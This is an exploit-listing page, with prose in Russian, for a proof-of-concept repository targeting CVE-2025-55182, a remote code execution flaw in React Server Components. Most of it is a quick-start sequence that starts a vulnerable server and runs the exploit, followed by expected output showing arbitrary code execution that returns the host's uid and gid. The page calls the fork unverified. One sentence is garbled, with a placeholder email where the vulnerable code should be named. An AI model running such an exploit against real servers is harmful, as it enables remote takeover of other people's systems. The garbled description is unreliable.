## https://sploitus.com/exploit?id=KITPLOIT:TOOLS-GITHUB-PA2SW0RD-EXPLOIT-CVE-2025-55182-POC
# CVE-2025-55182 - Уязвимость цепочки прототипов React Server Components
Этот PoC демонстрирует CVE-2025-55182 с использованием уязвимого кода `some-email@example.com`.
Руководство по экстренному исправлению CVE-2025-55182: полный анализ и смягчение для уязвимости Next.js/React RSC (CVSS 10.0)
Этот репозиторий является форком https://github.com/ejpir/CVE-2025-55182-poc и ещё не проверен! Пожалуйста, будьте осторожны и тщательно проверяйте!
## Быстрый старт
root@kitploit:~
# Install dependencies
npm install
# Start vulnerable server (port 3002)
npm start
# Run RCE exploit
npm run exploit
### Ожидаемый вывод
root@kitploit:~
=== CVE-2025-55182 - RCE через vm.runInThisContext ===
Test 1: Прямой вызов vm#runInThisContext с кодом
1+1 = {"success":true,"result":"2"}
Test 2: vm.runInThisContext с require
RCE attempt: {"success":true,"result":"uid=501(nick) gid=20(staff)..."}